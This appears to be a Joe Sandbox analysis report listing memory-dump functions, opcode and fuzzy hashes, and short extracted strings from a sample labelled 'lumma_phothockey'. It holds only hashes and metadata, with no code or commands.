Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231e52fe21c70da492d9a1a3da47112add31475a9ae63678308400440ae680b6
Instruction ID: 7ffa7bb660bde58b8d39b054093e5de83609f41e9cc4cbd77dcef26682f4797e
Opcode Fuzzy Hash: 231e52fe21c70da492d9a1a3da47112add31475a9ae63678308400440ae680b6
Instruction Fuzzy Hash: 2AE0E5B4D08208AFCB84DFA8D4457ACBBF8EB49204F10C0EE985C93345E6356A41DF41

Function 0736A980 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d3d1e4f928243e5dc39c7d374ed9b2f93e82450c975e91124a9e7c9b36d1f3c
Instruction ID: 334d7e3875bd1ea43af3476643306a8785f297bd8eca29712e96f11c1f25857a
Opcode Fuzzy Hash: 1d3d1e4f928243e5dc39c7d374ed9b2f93e82450c975e91124a9e7c9b36d1f3c
Instruction Fuzzy Hash: 8AE0EDB4D14208EFCB84DFA9D5456ACFBF4EB89204F20C0E9981CA3340E6315E41CF41

Function 073698F8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d3d1e4f928243e5dc39c7d374ed9b2f93e82450c975e91124a9e7c9b36d1f3c
Instruction ID: fb3e2805f8ac4caf05d127be0dcbe335075d76336b66bec6249e150da9e8c1cf
Opcode Fuzzy Hash: 1d3d1e4f928243e5dc39c7d374ed9b2f93e82450c975e91124a9e7c9b36d1f3c
Instruction Fuzzy Hash: 9DE0E5B4E05208EFCB84DFA8D4457ACBBF8EB49200F10C0AD980C93344E631AE46CF40

Function 072A5D19 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5adb20ce658073d2add960bcb8d8b130d694133009d0ad79de86ad3a89e98dd7
Instruction ID: 45d0479717ebed251154e934b96e5142146b7f500739af0ece807a8fc5e8c0bb
Opcode Fuzzy Hash: 5adb20ce658073d2add960bcb8d8b130d694133009d0ad79de86ad3a89e98dd7
Instruction Fuzzy Hash: 5CE0DF74929145ABC308CB64D5957AD7B70DF12304F2484CC881C4B292CA369C17C740

Function 072A2BC0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d093be0647e67acad8085af85faee2aabc1a87092468f8838e5432b3e7cbb506
Instruction ID: 75bbae1b800eb16832a7cddbe84e5992ccf6a86b88e1bedb0a155f7c33a36e78
Opcode Fuzzy Hash: d093be0647e67acad8085af85faee2aabc1a87092468f8838e5432b3e7cbb506
Instruction Fuzzy Hash: 70E08CB583A101EBC704CEA4C641BACB364EFA6A01F144A8D880857240CE368D42CB40

Function 072A8958 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9d2a4078bbfee38fb1e72cc2ad46733329d0272fc81d60e901da808796e8f42
Instruction ID: 954524961930847bce1e9573e95ba1065ec4bd83806c52d29ba4532111de6ccb
Opcode Fuzzy Hash: d9d2a4078bbfee38fb1e72cc2ad46733329d0272fc81d60e901da808796e8f42
Instruction Fuzzy Hash: EAE086B4928208FBC744DF94D441ABDBFB8AB46300F10809DD94957341CA31AF41DB95

Function 0736FBE8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f08a8ad075b4d7c7e744fec2fa7d83b5a456db3f5dcf8c775a191924ad26598b
Instruction ID: dd0e1f6f168ba368b76d4253f11119ace4aa07e00b5d073b33285654a5fd6984
Opcode Fuzzy Hash: f08a8ad075b4d7c7e744fec2fa7d83b5a456db3f5dcf8c775a191924ad26598b
Instruction Fuzzy Hash: E1E04FB4908208ABC704DF98E455AADBBB8AB46300F10C499DC4957341CA329A42DB94

Function 07368A5B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 393eeb893e8cbdf55c974372ab8231500efbf8a5aec629df98e079a05f417797
Instruction ID: c259856fe7edcf2250956b897ad9dfcb44c70823f559a9f45b666ec84881b8a1
Opcode Fuzzy Hash: 393eeb893e8cbdf55c974372ab8231500efbf8a5aec629df98e079a05f417797
Instruction Fuzzy Hash: BCF015B8A08289CFEB00DFA8D088B9D7BF6FB49300F108159D105AB348C7B89C828F04

Function 0736BC67 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d903dc663f7872d8b6b2128d2add75ac88ffd5fe2ac26c154bbd15306fe624e0
Instruction ID: 05081a1d76fbc68317fdd364d1fa7536a1f0e6d7457f91fcb9a84d8e06485bb6
Opcode Fuzzy Hash: d903dc663f7872d8b6b2128d2add75ac88ffd5fe2ac26c154bbd15306fe624e0
Instruction Fuzzy Hash: EBE01AB4D04208ABCB44DFA8D5556ACFFB9AB49200F20C0EAD84997741CA315B41DF85

Function 072A3D40 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b11fd937d210d92bb63b5871c317b7cd5324deefe0205b208a5785133194acd
Instruction ID: 75660ccbae45ba66630a598ea465f09c14f8123f6480336229bb2e68316f2efd
Opcode Fuzzy Hash: 6b11fd937d210d92bb63b5871c317b7cd5324deefe0205b208a5785133194acd
Instruction Fuzzy Hash: 9AE012B4D14208EBCB44DF98D4816ACBBB8EB89304F2080A9981897351CA31AE42DB80

Function 072A70E8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45cec2c9f79d2d274149be9d4c273039f3daba433bc41895df6c1507a6f05224
Instruction ID: e564adf272ee8ce77dec0dabf50285314c2b3a56d30f95a337d73cfc780e728a
Opcode Fuzzy Hash: 45cec2c9f79d2d274149be9d4c273039f3daba433bc41895df6c1507a6f05224
Instruction Fuzzy Hash: C4E08674914208FBCB04DF94D4459ADFBB9EB45300F1090ADDC0823340D6315E52DB88

Function 0724C910 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e28fb3e87e8da8fb40059529db1c7df69d04774538b509c20b3e4489c6b1888
Instruction ID: 11343ef7f44f59b847f9e2bf25e0a7bea909783334b62f4c65d8eab8dacc1e34
Opcode Fuzzy Hash: 1e28fb3e87e8da8fb40059529db1c7df69d04774538b509c20b3e4489c6b1888
Instruction Fuzzy Hash: 77E04F74D25208EFC784DFACD8457ACBBF8AB09200F2044A9884C97340E6319E81CB50

Function 0736AAB0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f33a36afa6c88b173be55c9d96339fd57569f053d78b1f184a4622ba2719396e
Instruction ID: 4be2e5fa3c57bb344607fec42ca5469421411f746098c74ce342972a63436129
Opcode Fuzzy Hash: f33a36afa6c88b173be55c9d96339fd57569f053d78b1f184a4622ba2719396e
Instruction Fuzzy Hash: 58E086B4914208FBDB04DF98D5459ADBBB9EB46300F14C099DC0923340C6319E51DBC4

Function 0736A470 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f33a36afa6c88b173be55c9d96339fd57569f053d78b1f184a4622ba2719396e
Instruction ID: 65b1a081bcca3fab115d3008861a5e5e21674e9eb7e8aa6aedce5c8fe8936f8a
Opcode Fuzzy Hash: f33a36afa6c88b173be55c9d96339fd57569f053d78b1f184a4622ba2719396e
Instruction Fuzzy Hash: 63E086B4905208EBCB04DF94E849AADBBB9EF45300F10C1A9DC0923340C6319E51DB84

Function 07369468 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a0a35270cdee782155afebd066cb0b834ebdeb58c6ee562df43f41226d06741
Instruction ID: 6da566ffa19047feffa1742a24c2bf53b553a3b8652da2c740ec19307e4a0eae
Opcode Fuzzy Hash: 2a0a35270cdee782155afebd066cb0b834ebdeb58c6ee562df43f41226d06741
Instruction Fuzzy Hash: B1E012B4D04208EBCB44DF98D6856ACBBB9EB89200F20C0EDD80D93340CA31AE42CB80

Function 072A5D28 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edb7f520540366efb81cf278f297ad0d31c64f81a50087f3a47619e7bdeff3c6
Instruction ID: 091c11c4c9c4d14af54ce62a34c245c8d100f6eec842456655e3d95bba9d29d6
Opcode Fuzzy Hash: edb7f520540366efb81cf278f297ad0d31c64f81a50087f3a47619e7bdeff3c6
Instruction Fuzzy Hash: 16E0C274928208FBCB08DF94D4456ADBBB8EB46300F2080DCD80817340CA315E52CB80

Function 072A3390 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edb7f520540366efb81cf278f297ad0d31c64f81a50087f3a47619e7bdeff3c6
Instruction ID: e8ff026c495df94a51c3b1c6348adc4a52ff4d245eb5af10b53d2f7ac2acdca1
Opcode Fuzzy Hash: edb7f520540366efb81cf278f297ad0d31c64f81a50087f3a47619e7bdeff3c6
Instruction Fuzzy Hash: 6CE0C274D28208FBCB04DF94D4416ACBBB8EB86300F2080DCC80813341CA325E42CB80

Function 073663F8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74338e08aed23f5b71f842932c2dfc7c601401241508db320f3593340002305
Instruction ID: 266f092ccc393ce6527f71d5699c09fadbb065bd4bc46cdb8814867d3c603345
Opcode Fuzzy Hash: a74338e08aed23f5b71f842932c2dfc7c601401241508db320f3593340002305
Instruction Fuzzy Hash: D7E0ECB4D55218EFDB44DFA8D44A6ADBFB8AB05215F5040B9980D93241EA305A94CB51

Function 07367AE0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef206cff6af46b10052a9e58d630cc246f651df81b1f1dd632063fb5265bc190
Instruction ID: 33b54f724d6ce2175ecaa36c51e713debdcc7bf86caa33add0e9247e9f4a4320
Opcode Fuzzy Hash: ef206cff6af46b10052a9e58d630cc246f651df81b1f1dd632063fb5265bc190
Instruction Fuzzy Hash: A3E0C2B1801208EBD700EBF1C4057DE77F9DF05200F6048E9810993210ED714E449796

Function 0736CD64 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672f693445a3235ba401a2068b2592674e4a404a373d11dba7bb23c54d61a2a3
Instruction ID: 162e138d098df6646f44cc660a24d25454772dfe666bd6222cc058c6d606c1bb
Opcode Fuzzy Hash: 672f693445a3235ba401a2068b2592674e4a404a373d11dba7bb23c54d61a2a3
Instruction Fuzzy Hash: 27E0E578621018CFE700DF58F488B5A77B5FB49300F409665E14AA7284CB797D46CF95

Function 07281250 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b746bfdb05244482b00c442ba5559d9dc46cd4c3837879b2d366c2db19db3b16
Instruction ID: 61a0b969a7cad299bc49d73332b08c6da274ba1b1350f9d121a1ed80a6db013c
Opcode Fuzzy Hash: b746bfdb05244482b00c442ba5559d9dc46cd4c3837879b2d366c2db19db3b16
Instruction Fuzzy Hash: 02D02233668BAA9FC70397A0F4124E8BBB0FF032203080083D184CB081D73B1296CBC2

Function 072A2BD0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b4429b675f9a0b49b09c3ff001b4314c8fa75f50265b3dd9238e5f21f4bbaf
Instruction ID: f3e6f2d31aaca9a2f2f9738dcfedeab7e09c7a1a84b248bbebeac6de341abf03
Opcode Fuzzy Hash: b4b4429b675f9a0b49b09c3ff001b4314c8fa75f50265b3dd9238e5f21f4bbaf
Instruction Fuzzy Hash: B5D05EB4529208FBC744CE94D841B6DF7ADEB8A304F50449C980D57351CA729D01CB40

Function 0724E508 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff22d18d91c077fb9ec9f3767e5ac80f79eb75349f785b07c71d4355ac96920
Instruction ID: bcddf4074eb814178f08f84985107c56294b5658320c9129705c162d2fa968c0
Opcode Fuzzy Hash: 5ff22d18d91c077fb9ec9f3767e5ac80f79eb75349f785b07c71d4355ac96920
Instruction Fuzzy Hash: AEE012B4E00208EFDB10DFA4E90569D77B5DB45244F104199D808D7340E9757E419F91

Function 0728C060 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c509defaf570a9d0293db27520416049fd53251aa67dbe8ab0e6e00865ad4eeb
Instruction ID: fc3b20e2a4f17f7dba1539855588b4d57d9c943c3ca03ba7b7790a0b3e22f239
Opcode Fuzzy Hash: c509defaf570a9d0293db27520416049fd53251aa67dbe8ab0e6e00865ad4eeb
Instruction Fuzzy Hash: D5D05E360182849FC302CF64C899DC5BFF49F0A26030A80C2E9488F233D221E860CBA6

Function 072880C0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713af8d4fe1685cde55747fcd4f72a02aec763548916374592c07f1d29c95eb8
Instruction ID: af2c73d3590eb155b23f54f733580dbe2b50e2e2a6947bf838113579f12fa059
Opcode Fuzzy Hash: 713af8d4fe1685cde55747fcd4f72a02aec763548916374592c07f1d29c95eb8
Instruction Fuzzy Hash: A0D012364883549FC30396D4F8529E2FFB8694662571C41E7E20CCB553C61BA9578BE2

Function 073611DD Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8863cb49e44ee337f7929e651fae619f3f155a159dc0d6b21dc6c5a64086ba6c
Instruction ID: 6d10112ad90a37fcd57bab0f905a78cd8db180bdd3b6e296e094935a0301c7db
Opcode Fuzzy Hash: 8863cb49e44ee337f7929e651fae619f3f155a159dc0d6b21dc6c5a64086ba6c
Instruction Fuzzy Hash: 1CD0C9B8911229CFEB64CF24DC48FB97BB2AB01201F0042E9910DA7155DF701EC5CF19

Function 0728C070 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 07282D5E Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f16aaca34846f2647446bc98935f111f4b3a71ad3dd7fcc3646f5b814afe918
Instruction ID: d627c5d27155f10419d24966f5a544ea718f0749133c637b2020bb06d60e708d
Opcode Fuzzy Hash: 5f16aaca34846f2647446bc98935f111f4b3a71ad3dd7fcc3646f5b814afe918
Instruction Fuzzy Hash: FAB012324001219FC701CB00EA0F809BB62EBE0300700C024B00086024C7345820DE14

Non-executed Functions

Function 072A89A0 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

S, xrefs: 072AABED
<, xrefs: 072AA6E3
o, xrefs: 072A8A6F

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: <$S$o
API String ID: 0-3485243253
Opcode ID: 5ba8dfa56d4906198180df3741edc3efef9e0c365b9ee0bfb049a7a28878f0bd
Instruction ID: eb29be8c9b22448152a6b1aea385a19625fb7ce03a3779b87bcc6fbf2e151dab
Opcode Fuzzy Hash: 5ba8dfa56d4906198180df3741edc3efef9e0c365b9ee0bfb049a7a28878f0bd
Instruction Fuzzy Hash: 7F51CAB1E107199FDB69CF6AD844799B6BBAFC9700F04C1EA940DA7254DB701E81CF11

Function 072828C8 Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

,q, xrefs: 072829BE
(q, xrefs: 07282C6C

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (q$,q
API String ID: 0-275420656
Opcode ID: d716df88b439d9fdf4e93f1cd8be30ca73c73ef9937096262f745d63f1af33da
Instruction ID: 3f832049ae959ecd895eb924489fbbe55fa4703771ba2b29709a8e78d9948935
Opcode Fuzzy Hash: d716df88b439d9fdf4e93f1cd8be30ca73c73ef9937096262f745d63f1af33da
Instruction Fuzzy Hash: E1D129B4A11606CFDB54EF69C584AADB7F2BF88710F26C598E405AB3A1C735EC81CB50

Function 07242668 Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

), xrefs: 07242D59
d%q, xrefs: 07242DE7

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: )$d%q
API String ID: 0-349843391
Opcode ID: bc8606c1bd8f80ae8704d802d089c6a2ca5ce179eb93fb08398f5f76a3f1b69d
Instruction ID: 1395943f406ac7d23f992851f2df41cc3b2ac8dc870bb1cb36697f732a802318
Opcode Fuzzy Hash: bc8606c1bd8f80ae8704d802d089c6a2ca5ce179eb93fb08398f5f76a3f1b69d
Instruction Fuzzy Hash: DF8147B5E14219DFEB58CF6AD844BAEBBF2BB89300F0481A9D409A7250DB749981CF40

Function 02DBB10E Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

4'q, xrefs: 02DBB1CF
4'q, xrefs: 02DBB1FA

Memory Dump Source

Source File: 00000000.00000002.1551993373.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2db0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 8df21a0e6a15db3e1beeddf3aacd19f60bd11e999ea9ff3f4c5f1bba28b52cca
Instruction ID: b67136aa6dd6893f61d01861c35df5e56ff7ef5a8d6fe9b9295d0f3b044e3518
Opcode Fuzzy Hash: 8df21a0e6a15db3e1beeddf3aacd19f60bd11e999ea9ff3f4c5f1bba28b52cca
Instruction Fuzzy Hash: 53711578E116498FE718DFAAE8456AEBBF3EFC8300F04C169D0089B264EB745906DF45

Function 02DBB118 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'q, xrefs: 02DBB1CF
4'q, xrefs: 02DBB1FA

Memory Dump Source

Source File: 00000000.00000002.1551993373.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2db0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: ab480b314ed41d837d37df8ca7f2f66f5bd98397e044dda49bdb6eabe9ae8ec0
Instruction ID: 5e94f13e9a442f19cca532149f14332f858e1060b12c4d38fde14274b864501f
Opcode Fuzzy Hash: ab480b314ed41d837d37df8ca7f2f66f5bd98397e044dda49bdb6eabe9ae8ec0
Instruction Fuzzy Hash: 4171F478E116498FD718DF6AE8456AEBBF3AFC8200F04C169E0099B264EB745906DF45

Function 07368068 Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

(, xrefs: 07368107
5, xrefs: 07368394

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: ($5
API String ID: 0-1850010575
Opcode ID: c74a7884551a363d239b3d217df3a508d481fc8845e3835be77378b89aa9aa86
Instruction ID: 64bc610af57a20d294c7ded727e615933c962edb1c0cf1a5c33784c614e62f8e
Opcode Fuzzy Hash: c74a7884551a363d239b3d217df3a508d481fc8845e3835be77378b89aa9aa86
Instruction Fuzzy Hash: 8A41C6B0D04658CBEB58CFAAC8487DDBBF7AB89300F14D0AAC40DAB258DB741985CF01

Function 0736CC70 Relevance: 2.5, Strings: 2, Instructions: 48COMMON

Download Yara Rule

Strings

,, xrefs: 0736CCCE
u, xrefs: 0736D162

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: ,$u
API String ID: 0-529597059
Opcode ID: 0580423d80540726fed17e5ed67f92c6159bcece5661cd54c73d95f72d78a026
Instruction ID: 433fc432cde753e24d2b422e3f4f8c531a2705318b0718bc40a9507c407f14c4
Opcode Fuzzy Hash: 0580423d80540726fed17e5ed67f92c6159bcece5661cd54c73d95f72d78a026
Instruction Fuzzy Hash: 3811FAB1E106089BEB08CFABC8446EEFAF7AFC9300F04D13AC418A6258DB3415068F55

Function 06624938 Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

dq, xrefs: 06624ADA

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: dq
API String ID: 0-4057445327
Opcode ID: 5361adc63c4d2341ee8138165cb9cad917a3514549fe9b0cf28e3370729bb484
Instruction ID: 476063ad4cc538c595d2018b294889fabc339c09ca31fa40e436f48b61c5f9bf
Opcode Fuzzy Hash: 5361adc63c4d2341ee8138165cb9cad917a3514549fe9b0cf28e3370729bb484
Instruction Fuzzy Hash: 20812574E04619CFDB54DFA9E948BEDBBF2FB89300F00906AD409A7244DBB85986CF41

Function 06624948 Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

dq, xrefs: 06624ADA

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: dq
